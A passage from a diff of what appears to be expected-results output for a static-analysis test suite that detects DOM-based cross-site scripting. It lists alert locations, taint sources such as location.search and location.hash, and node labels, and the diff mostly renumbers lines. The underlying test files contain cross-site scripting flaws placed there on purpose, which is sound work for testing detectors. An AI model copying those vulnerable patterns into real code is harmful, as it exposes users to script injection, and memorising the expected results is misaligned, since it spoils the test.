tst.js:360:21:360:26 | target | tst.js:355:19:355:42 | documen ... .search | tst.js:360:21:360:26 | target | Cross-site scripting vulnerability due to $@. | tst.js:355:19:355:42 | documen ... .search | user-provided value | -| tst.js:363:18:363:23 | target | tst.js:355:19:355:42 | documen ... .search | tst.js:363:18:363:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:355:19:355:42 | documen ... .search | user-provided value | -| tst.js:374:18:374:23 | target | tst.js:371:16:371:39 | documen ... .search | tst.js:374:18:374:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:371:16:371:39 | documen ... .search | user-provided value | -| tst.js:384:18:384:23 | target | tst.js:381:16:381:39 | documen ... .search | tst.js:384:18:384:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:381:16:381:39 | documen ... .search | user-provided value | -| tst.js:386:18:386:29 | target.taint | tst.js:381:16:381:39 | documen ... .search | tst.js:386:18:386:29 | target.taint | Cross-site scripting vulnerability due to $@. | tst.js:381:16:381:39 | documen ... .search | user-provided value | -| tst.js:392:18:392:30 | target.taint3 | tst.js:391:19:391:42 | documen ... .search | tst.js:392:18:392:30 | target.taint3 | Cross-site scripting vulnerability due to $@. | tst.js:391:19:391:42 | documen ... .search | user-provided value | -| tst.js:397:18:397:30 | target.taint5 | tst.js:381:16:381:39 | documen ... .search | tst.js:397:18:397:30 | target.taint5 | Cross-site scripting vulnerability due to $@. | tst.js:381:16:381:39 | documen ... .search | user-provided value | -| tst.js:406:18:406:30 | target.taint7 | tst.js:381:16:381:39 | documen ... .search | tst.js:406:18:406:30 | target.taint7 | Cross-site scripting vulnerability due to $@. | tst.js:381:16:381:39 | documen ... .search | user-provided value | -| tst.js:409:18:409:30 | target.taint8 | tst.js:381:16:381:39 | documen ... .search | tst.js:409:18:409:30 | target.taint8 | Cross-site scripting vulnerability due to $@. | tst.js:381:16:381:39 | documen ... .search | user-provided value | -| tst.js:417:18:417:24 | payload | tst.js:416:17:416:36 | window.location.hash | tst.js:417:18:417:24 | payload | Cross-site scripting vulnerability due to $@. | tst.js:416:17:416:36 | window.location.hash | user-provided value | -| tst.js:421:20:421:27 | match[1] | tst.js:419:15:419:34 | window.location.hash | tst.js:421:20:421:27 | match[1] | Cross-site scripting vulnerability due to $@. | tst.js:419:15:419:34 | window.location.hash | user-provided value | -| tst.js:424:18:424:51 | window. ... '#')[1] | tst.js:424:18:424:37 | window.location.hash | tst.js:424:18:424:51 | window. ... '#')[1] | Cross-site scripting vulnerability due to $@. | tst.js:424:18:424:37 | window.location.hash | user-provided value | -| tst.js:430:18:430:89 | target. ... data>') | tst.js:428:16:428:39 | documen ... .search | tst.js:430:18:430:89 | target. ... data>') | Cross-site scripting vulnerability due to $@. | tst.js:428:16:428:39 | documen ... .search | user-provided value | -| tst.js:440:28:440:33 | source | tst.js:436:15:436:38 | documen ... .search | tst.js:440:28:440:33 | source | Cross-site scripting vulnerability due to $@. | tst.js:436:15:436:38 | documen ... .search | user-provided value | -| tst.js:441:33:441:38 | source | tst.js:436:15:436:38 | documen ... .search | tst.js:441:33:441:38 | source | Cross-site scripting vulnerability due to $@. | tst.js:436:15:436:38 | documen ... .search | user-provided value | -| tst.js:442:34:442:39 | source | tst.js:436:15:436:38 | documen ... .search | tst.js:442:34:442:39 | source | Cross-site scripting vulnerability due to $@. | tst.js:436:15:436:38 | documen ... .search | user-provided value | -| tst.js:443:41:443:46 | source | tst.js:436:15:436:38 | documen ... .search | tst.js:443:41:443:46 | source | Cross-site scripting vulnerability due to $@. | tst.js:436:15:436:38 | documen ... .search | user-provided value | -| tst.js:444:44:444:49 | source | tst.js:436:15:436:38 | documen ... .search | tst.js:444:44:444:49 | source | Cross-site scripting vulnerability due to $@. | tst.js:436:15:436:38 | documen ... .search | user-provided value | -| tst.js:445:32:445:37 | source | tst.js:436:15:436:38 | documen ... .search | tst.js:445:32:445:37 | source | Cross-site scripting vulnerability due to $@. | tst.js:436:15:436:38 | documen ... .search | user-provided value | -| tst.js:455:18:455:23 | source | tst.js:453:16:453:39 | documen ... .search | tst.js:455:18:455:23 | source | Cross-site scripting vulnerability due to $@. | tst.js:453:16:453:39 | documen ... .search | user-provided value | -| tst.js:456:18:456:42 | ansiToH ... source) | tst.js:453:16:453:39 | documen ... .search | tst.js:456:18:456:42 | ansiToH ... source) | Cross-site scripting vulnerability due to $@. | tst.js:453:16:453:39 | documen ... .search | user-provided value | -| tst.js:463:21:463:26 | source | tst.js:460:15:460:38 | documen ... .search | tst.js:463:21:463:26 | source | Cross-site scripting vulnerability due to $@. | tst.js:460:15:460:38 | documen ... .search | user-provided value | -| tst.js:465:19:465:24 | source | tst.js:460:15:460:38 | documen ... .search | tst.js:465:19:465:24 | source | Cross-site scripting vulnerability due to $@. | tst.js:460:15:460:38 | documen ... .search | user-provided value | -| tst.js:467:20:467:25 | source | tst.js:460:15:460:38 | documen ... .search | tst.js:467:20:467:25 | source | Cross-site scripting vulnerability due to $@. | tst.js:460:15:460:38 | documen ... .search | user-provided value | -| tst.js:473:19:473:21 | url | tst.js:471:13:471:36 | documen ... .search | tst.js:473:19:473:21 | url | Cross-site scripting vulnerability due to $@. | tst.js:471:13:471:36 | documen ... .search | user-provided value | -| tst.js:474:26:474:28 | url | tst.js:471:13:471:36 | documen ... .search | tst.js:474:26:474:28 | url | Cross-site scripting vulnerability due to $@. | tst.js:471:13:471:36 | documen ... .search | user-provided value | -| tst.js:475:25:475:27 | url | tst.js:471:13:471:36 | documen ... .search | tst.js:475:25:475:27 | url | Cross-site scripting vulnerability due to $@. | tst.js:471:13:471:36 | documen ... .search | user-provided value | -| tst.js:476:20:476:22 | url | tst.js:471:13:471:36 | documen ... .search | tst.js:476:20:476:22 | url | Cross-site scripting vulnerability due to $@. | tst.js:471:13:471:36 | documen ... .search | user-provided value | -| tst.js:486:22:486:24 | url | tst.js:471:13:471:36 | documen ... .search | tst.js:486:22:486:24 | url | Cross-site scripting vulnerability due to $@. | tst.js:471:13:471:36 | documen ... .search | user-provided value | -| tst.js:491:23:491:45 | locatio ... bstr(1) | tst.js:491:23:491:35 | location.hash | tst.js:491:23:491:45 | locatio ... bstr(1) | Cross-site scripting vulnerability due to $@. | tst.js:491:23:491:35 | location.hash | user-provided value | -| tst.js:494:18:494:40 | locatio ... bstr(1) | tst.js:494:18:494:30 | location.hash | tst.js:494:18:494:40 | locatio ... bstr(1) | Cross-site scripting vulnerability due to $@. | tst.js:494:18:494:30 | location.hash | user-provided value | -| tst.js:501:33:501:63 | decodeU ... n.hash) | tst.js:501:43:501:62 | window.location.hash | tst.js:501:33:501:63 | decodeU ... n.hash) | Cross-site scripting vulnerability due to $@. | tst.js:501:43:501:62 | window.location.hash | user-provided value | -| tst.js:509:18:509:54 | target. ... "), '') | tst.js:508:16:508:39 | documen ... .search | tst.js:509:18:509:54 | target. ... "), '') | Cross-site scripting vulnerability due to $@. | tst.js:508:16:508:39 | documen ... .search | user-provided value | -| typeahead.js:25:18:25:20 | val | typeahead.js:20:22:20:45 | documen ... .search | typeahead.js:25:18:25:20 | val | Cross-site scripting vulnerability due to $@. | typeahead.js:20:22:20:45 | documen ... .search | user-provided value | -| various-concat-obfuscations.js:4:4:4:31 | "
    " ...
    " | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | various-concat-obfuscations.js:4:4:4:31 | "
    " ...
    " | Cross-site scripting vulnerability due to $@. | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | user-provided value | -| various-concat-obfuscations.js:5:4:5:26 | `
    $ ...
    ` | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | various-concat-obfuscations.js:5:4:5:26 | `
    $ ...
    ` | Cross-site scripting vulnerability due to $@. | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | user-provided value | -| various-concat-obfuscations.js:6:4:6:43 | "
    " ... /div>") | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | various-concat-obfuscations.js:6:4:6:43 | "
    " ... /div>") | Cross-site scripting vulnerability due to $@. | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | user-provided value | -| various-concat-obfuscations.js:7:4:7:38 | ["
    ... .join() | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | various-concat-obfuscations.js:7:4:7:38 | ["
    ... .join() | Cross-site scripting vulnerability due to $@. | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | user-provided value | -| various-concat-obfuscations.js:9:4:9:34 | "
    " | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | various-concat-obfuscations.js:9:4:9:34 | "
    " | Cross-site scripting vulnerability due to $@. | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | user-provided value | -| various-concat-obfuscations.js:10:4:10:27 | `
    ` | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | various-concat-obfuscations.js:10:4:10:27 | `
    ` | Cross-site scripting vulnerability due to $@. | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | user-provided value | -| various-concat-obfuscations.js:11:4:11:44 | "
    ") | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | various-concat-obfuscations.js:11:4:11:44 | "
    ") | Cross-site scripting vulnerability due to $@. | various-concat-obfuscations.js:2:16:2:39 | documen ... .search | user-provided value | -| various-concat-obfuscations.js:12:4:12:41 | ["
    ' | semmle.label | '

    ' | | event-handler-receiver.js:2:49:2:61 | location.href | semmle.label | location.href | -| express.js:7:15:7:33 | req.param("wobble") | semmle.label | req.param("wobble") | +| express.js:6:15:6:33 | req.param("wobble") | semmle.label | req.param("wobble") | +| hana.js:11:37:11:40 | rows | semmle.label | rows | +| hana.js:11:37:11:51 | rows[0].comment | semmle.label | rows[0].comment | +| hana.js:16:37:16:40 | rows | semmle.label | rows | +| hana.js:16:37:16:51 | rows[0].comment | semmle.label | rows[0].comment | +| hana.js:19:37:19:40 | rows | semmle.label | rows | +| hana.js:19:37:19:51 | rows[0].comment | semmle.label | rows[0].comment | +| hana.js:22:37:22:38 | rs | semmle.label | rs | +| hana.js:22:37:22:49 | rs[0].comment | semmle.label | rs[0].comment | +| hana.js:38:31:38:32 | rs | semmle.label | rs | +| hana.js:38:31:38:43 | rs[0].comment | semmle.label | rs[0].comment | +| hana.js:43:33:43:41 | dummyRows | semmle.label | dummyRows | +| hana.js:43:33:43:52 | dummyRows[0].comment | semmle.label | dummyRows[0].comment | +| hana.js:44:33:44:42 | tablesRows | semmle.label | tablesRows | +| hana.js:44:33:44:53 | tablesR ... comment | semmle.label | tablesR ... comment | +| hana.js:50:33:50:41 | dummyRows | semmle.label | dummyRows | +| hana.js:50:33:50:52 | dummyRows[0].comment | semmle.label | dummyRows[0].comment | +| hana.js:51:33:51:42 | tablesRows | semmle.label | tablesRows | +| hana.js:51:33:51:53 | tablesR ... comment | semmle.label | tablesR ... comment | +| hana.js:70:33:70:36 | rows | semmle.label | rows | +| hana.js:70:33:70:47 | rows[0].comment | semmle.label | rows[0].comment | +| hana.js:73:33:73:36 | rows | semmle.label | rows | +| hana.js:73:33:73:47 | rows[0].comment | semmle.label | rows[0].comment | +| hana.js:84:35:84:43 | dummyRows | semmle.label | dummyRows | +| hana.js:84:35:84:54 | dummyRows[0].comment | semmle.label | dummyRows[0].comment | +| hana.js:85:35:85:43 | tableRows | semmle.label | tableRows | +| hana.js:85:35:85:54 | tableRows[0].comment | semmle.label | tableRows[0].comment | +| hana.js:90:33:90:34 | rs | semmle.label | rs | +| hana.js:90:33:90:45 | rs[0].comment | semmle.label | rs[0].comment | | jquery.js:2:7:2:40 | tainted | semmle.label | tainted | | jquery.js:2:17:2:40 | documen ... .search | semmle.label | documen ... .search | | jquery.js:4:5:4:11 | tainted | semmle.label | tainted | @@ -202,8 +230,8 @@ nodes | jwt-server.js:7:17:7:35 | req.param("wobble") | semmle.label | req.param("wobble") | | jwt-server.js:9:16:9:20 | taint | semmle.label | taint | | jwt-server.js:9:55:9:61 | decoded | semmle.label | decoded | -| jwt-server.js:11:19:11:25 | decoded | semmle.label | decoded | -| jwt-server.js:11:19:11:29 | decoded.foo | semmle.label | decoded.foo | +| jwt-server.js:10:19:10:25 | decoded | semmle.label | decoded | +| jwt-server.js:10:19:10:29 | decoded.foo | semmle.label | decoded.foo | | jwt.js:4:36:4:39 | data | semmle.label | data | | jwt.js:5:9:5:34 | decoded | semmle.label | decoded | | jwt.js:5:19:5:34 | jwt_decode(data) | semmle.label | jwt_decode(data) | @@ -252,8 +280,8 @@ nodes | pages/[id].jsx:13:44:13:52 | params.id | semmle.label | params.id | | pages/[id].jsx:16:44:16:49 | params [q] | semmle.label | params [q] | | pages/[id].jsx:16:44:16:51 | params.q | semmle.label | params.q | -| pages/[id].jsx:24:12:27:5 | {\\n ... ,\\n } [id] | semmle.label | {\\n ... ,\\n } [id] | -| pages/[id].jsx:24:12:27:5 | {\\n ... ,\\n } [q] | semmle.label | {\\n ... ,\\n } [q] | +| pages/[id].jsx:24:12:27:5 | {\\n ... e\\n } [id] | semmle.label | {\\n ... e\\n } [id] | +| pages/[id].jsx:24:12:27:5 | {\\n ... e\\n } [q] | semmle.label | {\\n ... e\\n } [q] | | pages/[id].jsx:25:11:25:24 | context.params | semmle.label | context.params | | pages/[id].jsx:25:11:25:33 | context ... d \|\| "" | semmle.label | context ... d \|\| "" | | pages/[id].jsx:26:10:26:22 | context.query | semmle.label | context.query | @@ -348,9 +376,9 @@ nodes | translate.js:7:42:7:60 | target.substring(1) | semmle.label | target.substring(1) | | translate.js:7:42:7:60 | target.substring(1) | semmle.label | target.substring(1) | | translate.js:7:42:7:60 | target.substring(1) | semmle.label | target.substring(1) | -| translate.js:9:27:9:38 | searchParams | semmle.label | searchParams | -| translate.js:9:27:9:38 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | -| translate.js:9:27:9:50 | searchP ... 'term') | semmle.label | searchP ... 'term') | +| translate.js:8:27:8:38 | searchParams | semmle.label | searchParams | +| translate.js:8:27:8:38 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | +| translate.js:8:27:8:50 | searchP ... 'term') | semmle.label | searchP ... 'term') | | trusted-types-lib.js:1:28:1:28 | x | semmle.label | x | | trusted-types-lib.js:2:12:2:12 | x | semmle.label | x | | trusted-types.js:3:62:3:62 | x | semmle.label | x | @@ -373,240 +401,244 @@ nodes | tst3.js:10:38:10:43 | data.p | semmle.label | data.p | | tst.js:2:7:2:39 | target | semmle.label | target | | tst.js:2:16:2:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:5:18:5:23 | target | semmle.label | target | -| tst.js:8:18:8:126 | "" | semmle.label | "" | -| tst.js:8:37:8:58 | documen ... on.href | semmle.label | documen ... on.href | -| tst.js:8:37:8:114 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | -| tst.js:8:37:8:114 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | -| tst.js:12:5:12:42 | '
    ' | semmle.label | '
    ' | -| tst.js:12:28:12:33 | target | semmle.label | target | -| tst.js:17:7:17:56 | params | semmle.label | params | -| tst.js:17:7:17:56 | params [MapValue] | semmle.label | params [MapValue] | -| tst.js:17:16:17:43 | (new UR ... ation)) [searchParams, MapValue] | semmle.label | (new UR ... ation)) [searchParams, MapValue] | -| tst.js:17:16:17:43 | (new UR ... ation)) [searchParams] | semmle.label | (new UR ... ation)) [searchParams] | -| tst.js:17:16:17:56 | (new UR ... hParams | semmle.label | (new UR ... hParams | -| tst.js:17:16:17:56 | (new UR ... hParams [MapValue] | semmle.label | (new UR ... hParams [MapValue] | -| tst.js:17:17:17:42 | new URL ... cation) [searchParams, MapValue] | semmle.label | new URL ... cation) [searchParams, MapValue] | -| tst.js:17:17:17:42 | new URL ... cation) [searchParams] | semmle.label | new URL ... cation) [searchParams] | -| tst.js:17:25:17:41 | document.location | semmle.label | document.location | -| tst.js:18:18:18:23 | params | semmle.label | params | -| tst.js:18:18:18:23 | params [MapValue] | semmle.label | params [MapValue] | -| tst.js:18:18:18:35 | params.get('name') | semmle.label | params.get('name') | -| tst.js:20:7:20:61 | searchParams | semmle.label | searchParams | -| tst.js:20:7:20:61 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | -| tst.js:20:22:20:61 | new URL ... ing(1)) | semmle.label | new URL ... ing(1)) | -| tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | semmle.label | new URL ... ing(1)) [MapValue] | -| tst.js:20:42:20:47 | target | semmle.label | target | -| tst.js:20:42:20:60 | target.substring(1) | semmle.label | target.substring(1) | -| tst.js:20:42:20:60 | target.substring(1) | semmle.label | target.substring(1) | -| tst.js:20:42:20:60 | target.substring(1) | semmle.label | target.substring(1) | -| tst.js:21:18:21:29 | searchParams | semmle.label | searchParams | -| tst.js:21:18:21:29 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | -| tst.js:21:18:21:41 | searchP ... 'name') | semmle.label | searchP ... 'name') | -| tst.js:24:14:24:19 | target | semmle.label | target | -| tst.js:26:18:26:23 | target | semmle.label | target | -| tst.js:28:5:28:28 | documen ... .search | semmle.label | documen ... .search | -| tst.js:31:10:31:33 | documen ... .search | semmle.label | documen ... .search | -| tst.js:34:16:34:20 | bar() | semmle.label | bar() | -| tst.js:36:14:36:14 | x | semmle.label | x | -| tst.js:37:10:37:10 | x | semmle.label | x | -| tst.js:40:16:40:44 | baz(doc ... search) | semmle.label | baz(doc ... search) | -| tst.js:40:20:40:43 | documen ... .search | semmle.label | documen ... .search | -| tst.js:42:15:42:15 | s | semmle.label | s | -| tst.js:42:15:42:15 | s | semmle.label | s | -| tst.js:43:10:43:31 | "
    " ...
    " | semmle.label | "
    " ...
    " | -| tst.js:43:20:43:20 | s | semmle.label | s | -| tst.js:43:20:43:20 | s | semmle.label | s | -| tst.js:46:16:46:45 | wrap(do ... search) | semmle.label | wrap(do ... search) | +| tst.js:4:18:4:23 | target | semmle.label | target | +| tst.js:6:18:6:126 | "" | semmle.label | "" | +| tst.js:6:37:6:58 | documen ... on.href | semmle.label | documen ... on.href | +| tst.js:6:37:6:114 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | +| tst.js:6:37:6:114 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | +| tst.js:9:5:9:42 | '
    ' | semmle.label | '
    ' | +| tst.js:9:28:9:33 | target | semmle.label | target | +| tst.js:14:7:14:56 | params | semmle.label | params | +| tst.js:14:7:14:56 | params [MapValue] | semmle.label | params [MapValue] | +| tst.js:14:16:14:43 | (new UR ... ation)) [searchParams, MapValue] | semmle.label | (new UR ... ation)) [searchParams, MapValue] | +| tst.js:14:16:14:43 | (new UR ... ation)) [searchParams] | semmle.label | (new UR ... ation)) [searchParams] | +| tst.js:14:16:14:56 | (new UR ... hParams | semmle.label | (new UR ... hParams | +| tst.js:14:16:14:56 | (new UR ... hParams [MapValue] | semmle.label | (new UR ... hParams [MapValue] | +| tst.js:14:17:14:42 | new URL ... cation) [searchParams, MapValue] | semmle.label | new URL ... cation) [searchParams, MapValue] | +| tst.js:14:17:14:42 | new URL ... cation) [searchParams] | semmle.label | new URL ... cation) [searchParams] | +| tst.js:14:25:14:41 | document.location | semmle.label | document.location | +| tst.js:15:18:15:23 | params | semmle.label | params | +| tst.js:15:18:15:23 | params [MapValue] | semmle.label | params [MapValue] | +| tst.js:15:18:15:35 | params.get('name') | semmle.label | params.get('name') | +| tst.js:17:7:17:61 | searchParams | semmle.label | searchParams | +| tst.js:17:7:17:61 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | +| tst.js:17:22:17:61 | new URL ... ing(1)) | semmle.label | new URL ... ing(1)) | +| tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | semmle.label | new URL ... ing(1)) [MapValue] | +| tst.js:17:42:17:47 | target | semmle.label | target | +| tst.js:17:42:17:60 | target.substring(1) | semmle.label | target.substring(1) | +| tst.js:17:42:17:60 | target.substring(1) | semmle.label | target.substring(1) | +| tst.js:17:42:17:60 | target.substring(1) | semmle.label | target.substring(1) | +| tst.js:18:18:18:29 | searchParams | semmle.label | searchParams | +| tst.js:18:18:18:29 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | +| tst.js:18:18:18:41 | searchP ... 'name') | semmle.label | searchP ... 'name') | +| tst.js:21:14:21:19 | target | semmle.label | target | +| tst.js:22:18:22:23 | target | semmle.label | target | +| tst.js:24:5:24:28 | documen ... .search | semmle.label | documen ... .search | +| tst.js:27:10:27:33 | documen ... .search | semmle.label | documen ... .search | +| tst.js:29:16:29:20 | bar() | semmle.label | bar() | +| tst.js:31:14:31:14 | x | semmle.label | x | +| tst.js:32:10:32:10 | x | semmle.label | x | +| tst.js:34:16:34:44 | baz(doc ... search) | semmle.label | baz(doc ... search) | +| tst.js:34:20:34:43 | documen ... .search | semmle.label | documen ... .search | +| tst.js:36:15:36:15 | s | semmle.label | s | +| tst.js:36:15:36:15 | s | semmle.label | s | +| tst.js:37:10:37:31 | "
    " ...
    " | semmle.label | "
    " ...
    " | +| tst.js:37:20:37:20 | s | semmle.label | s | +| tst.js:37:20:37:20 | s | semmle.label | s | +| tst.js:39:16:39:45 | wrap(do ... search) | semmle.label | wrap(do ... search) | +| tst.js:39:21:39:44 | documen ... .search | semmle.label | documen ... .search | +| tst.js:41:15:41:15 | s | semmle.label | s | +| tst.js:43:12:43:12 | s | semmle.label | s | +| tst.js:43:12:43:22 | s.substr(1) | semmle.label | s.substr(1) | +| tst.js:43:12:43:22 | s.substr(1) | semmle.label | s.substr(1) | +| tst.js:43:12:43:22 | s.substr(1) | semmle.label | s.substr(1) | +| tst.js:46:16:46:45 | chop(do ... search) | semmle.label | chop(do ... search) | | tst.js:46:21:46:44 | documen ... .search | semmle.label | documen ... .search | -| tst.js:48:15:48:15 | s | semmle.label | s | -| tst.js:50:12:50:12 | s | semmle.label | s | -| tst.js:50:12:50:22 | s.substr(1) | semmle.label | s.substr(1) | -| tst.js:50:12:50:22 | s.substr(1) | semmle.label | s.substr(1) | -| tst.js:50:12:50:22 | s.substr(1) | semmle.label | s.substr(1) | -| tst.js:54:16:54:45 | chop(do ... search) | semmle.label | chop(do ... search) | -| tst.js:54:21:54:44 | documen ... .search | semmle.label | documen ... .search | -| tst.js:56:16:56:45 | chop(do ... search) | semmle.label | chop(do ... search) | -| tst.js:56:21:56:44 | documen ... .search | semmle.label | documen ... .search | -| tst.js:58:16:58:32 | wrap(chop(bar())) | semmle.label | wrap(chop(bar())) | -| tst.js:58:21:58:31 | chop(bar()) | semmle.label | chop(bar()) | -| tst.js:58:21:58:31 | chop(bar()) | semmle.label | chop(bar()) | -| tst.js:58:26:58:30 | bar() | semmle.label | bar() | -| tst.js:60:34:60:34 | s | semmle.label | s | -| tst.js:62:18:62:18 | s | semmle.label | s | -| tst.js:64:25:64:48 | documen ... .search | semmle.label | documen ... .search | -| tst.js:65:25:65:48 | documen ... .search | semmle.label | documen ... .search | -| tst.js:68:16:68:20 | bar() | semmle.label | bar() | -| tst.js:70:1:70:27 | [,docum ... search] [1] | semmle.label | [,docum ... search] [1] | -| tst.js:70:3:70:26 | documen ... .search | semmle.label | documen ... .search | -| tst.js:70:46:70:46 | x | semmle.label | x | -| tst.js:73:20:73:20 | x | semmle.label | x | -| tst.js:77:49:77:72 | documen ... .search | semmle.label | documen ... .search | -| tst.js:81:26:81:49 | documen ... .search | semmle.label | documen ... .search | -| tst.js:82:25:82:48 | documen ... .search | semmle.label | documen ... .search | -| tst.js:84:33:84:56 | documen ... .search | semmle.label | documen ... .search | -| tst.js:85:32:85:55 | documen ... .search | semmle.label | documen ... .search | -| tst.js:90:39:90:62 | documen ... .search | semmle.label | documen ... .search | -| tst.js:96:30:96:53 | documen ... .search | semmle.label | documen ... .search | -| tst.js:102:25:102:48 | documen ... .search | semmle.label | documen ... .search | -| tst.js:107:7:107:44 | v | semmle.label | v | -| tst.js:107:11:107:34 | documen ... .search | semmle.label | documen ... .search | -| tst.js:107:11:107:44 | documen ... bstr(1) | semmle.label | documen ... bstr(1) | -| tst.js:110:18:110:18 | v | semmle.label | v | -| tst.js:136:18:136:18 | v | semmle.label | v | -| tst.js:148:29:148:50 | window. ... .search | semmle.label | window. ... .search | -| tst.js:151:29:151:29 | v | semmle.label | v | -| tst.js:151:49:151:49 | v | semmle.label | v | -| tst.js:155:29:155:46 | xssSourceService() | semmle.label | xssSourceService() | -| tst.js:158:40:158:61 | window. ... .search | semmle.label | window. ... .search | -| tst.js:177:9:177:41 | target | semmle.label | target | -| tst.js:177:18:177:41 | documen ... .search | semmle.label | documen ... .search | -| tst.js:180:28:180:33 | target | semmle.label | target | -| tst.js:184:9:184:42 | tainted | semmle.label | tainted | -| tst.js:184:19:184:42 | documen ... .search | semmle.label | documen ... .search | -| tst.js:186:31:186:37 | tainted | semmle.label | tainted | -| tst.js:188:42:188:48 | tainted | semmle.label | tainted | -| tst.js:189:33:189:39 | tainted | semmle.label | tainted | -| tst.js:191:54:191:60 | tainted | semmle.label | tainted | -| tst.js:192:45:192:51 | tainted | semmle.label | tainted | -| tst.js:193:49:193:55 | tainted | semmle.label | tainted | -| tst.js:197:9:197:42 | tainted | semmle.label | tainted | -| tst.js:197:19:197:42 | documen ... .search | semmle.label | documen ... .search | -| tst.js:199:67:199:73 | tainted | semmle.label | tainted | -| tst.js:200:67:200:73 | tainted | semmle.label | tainted | -| tst.js:204:35:204:41 | tainted | semmle.label | tainted | -| tst.js:206:46:206:52 | tainted | semmle.label | tainted | -| tst.js:207:38:207:44 | tainted | semmle.label | tainted | -| tst.js:208:35:208:41 | tainted | semmle.label | tainted | -| tst.js:212:28:212:46 | this.state.tainted1 | semmle.label | this.state.tainted1 | -| tst.js:213:28:213:46 | this.state.tainted2 | semmle.label | this.state.tainted2 | -| tst.js:214:28:214:46 | this.state.tainted3 | semmle.label | this.state.tainted3 | -| tst.js:218:32:218:49 | prevState.tainted4 | semmle.label | prevState.tainted4 | -| tst.js:225:28:225:46 | this.props.tainted1 | semmle.label | this.props.tainted1 | -| tst.js:226:28:226:46 | this.props.tainted2 | semmle.label | this.props.tainted2 | -| tst.js:227:28:227:46 | this.props.tainted3 | semmle.label | this.props.tainted3 | -| tst.js:231:32:231:49 | prevProps.tainted4 | semmle.label | prevProps.tainted4 | -| tst.js:236:35:236:41 | tainted | semmle.label | tainted | -| tst.js:238:20:238:26 | tainted | semmle.label | tainted | -| tst.js:240:23:240:29 | tainted | semmle.label | tainted | -| tst.js:241:23:241:29 | tainted | semmle.label | tainted | -| tst.js:247:39:247:55 | props.propTainted | semmle.label | props.propTainted | -| tst.js:251:60:251:82 | this.st ... Tainted | semmle.label | this.st ... Tainted | -| tst.js:255:23:255:29 | tainted | semmle.label | tainted | -| tst.js:259:7:259:17 | window.name | semmle.label | window.name | -| tst.js:260:7:260:10 | name | semmle.label | name | -| tst.js:264:11:264:21 | window.name | semmle.label | window.name | -| tst.js:280:22:280:29 | location | semmle.label | location | -| tst.js:285:9:285:29 | tainted | semmle.label | tainted | -| tst.js:285:19:285:29 | window.name | semmle.label | window.name | -| tst.js:288:59:288:65 | tainted | semmle.label | tainted | -| tst.js:301:9:301:16 | location | semmle.label | location | -| tst.js:302:10:302:10 | e | semmle.label | e | -| tst.js:303:20:303:20 | e | semmle.label | e | -| tst.js:308:10:308:17 | location | semmle.label | location | -| tst.js:310:10:310:10 | e | semmle.label | e | -| tst.js:311:20:311:20 | e | semmle.label | e | -| tst.js:316:35:316:42 | location | semmle.label | location | -| tst.js:327:10:327:35 | new URL ... cation) [searchParams, MapValue] | semmle.label | new URL ... cation) [searchParams, MapValue] | -| tst.js:327:10:327:35 | new URL ... cation) [searchParams] | semmle.label | new URL ... cation) [searchParams] | -| tst.js:327:18:327:34 | document.location | semmle.label | document.location | -| tst.js:331:7:331:43 | params | semmle.label | params | -| tst.js:331:7:331:43 | params [MapValue] | semmle.label | params [MapValue] | -| tst.js:331:16:331:30 | getTaintedUrl() [searchParams, MapValue] | semmle.label | getTaintedUrl() [searchParams, MapValue] | -| tst.js:331:16:331:30 | getTaintedUrl() [searchParams] | semmle.label | getTaintedUrl() [searchParams] | -| tst.js:331:16:331:43 | getTain ... hParams | semmle.label | getTain ... hParams | -| tst.js:331:16:331:43 | getTain ... hParams [MapValue] | semmle.label | getTain ... hParams [MapValue] | -| tst.js:332:18:332:23 | params | semmle.label | params | -| tst.js:332:18:332:23 | params [MapValue] | semmle.label | params [MapValue] | -| tst.js:332:18:332:35 | params.get('name') | semmle.label | params.get('name') | -| tst.js:341:12:341:37 | new URL ... cation) [hash] | semmle.label | new URL ... cation) [hash] | -| tst.js:341:20:341:36 | document.location | semmle.label | document.location | -| tst.js:343:5:343:12 | getUrl() [hash] | semmle.label | getUrl() [hash] | -| tst.js:343:5:343:17 | getUrl().hash | semmle.label | getUrl().hash | -| tst.js:343:5:343:30 | getUrl( ... ring(1) | semmle.label | getUrl( ... ring(1) | -| tst.js:348:7:348:39 | target | semmle.label | target | -| tst.js:348:16:348:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:349:12:349:17 | target | semmle.label | target | -| tst.js:355:10:355:42 | target | semmle.label | target | -| tst.js:355:19:355:42 | documen ... .search | semmle.label | documen ... .search | -| tst.js:356:16:356:21 | target | semmle.label | target | -| tst.js:357:20:357:25 | target | semmle.label | target | -| tst.js:360:21:360:26 | target | semmle.label | target | -| tst.js:363:18:363:23 | target | semmle.label | target | -| tst.js:371:7:371:39 | target | semmle.label | target | -| tst.js:371:16:371:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:374:18:374:23 | target | semmle.label | target | -| tst.js:381:7:381:39 | target | semmle.label | target | -| tst.js:381:16:381:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:384:18:384:23 | target | semmle.label | target | -| tst.js:386:18:386:23 | target | semmle.label | target | -| tst.js:386:18:386:29 | target.taint | semmle.label | 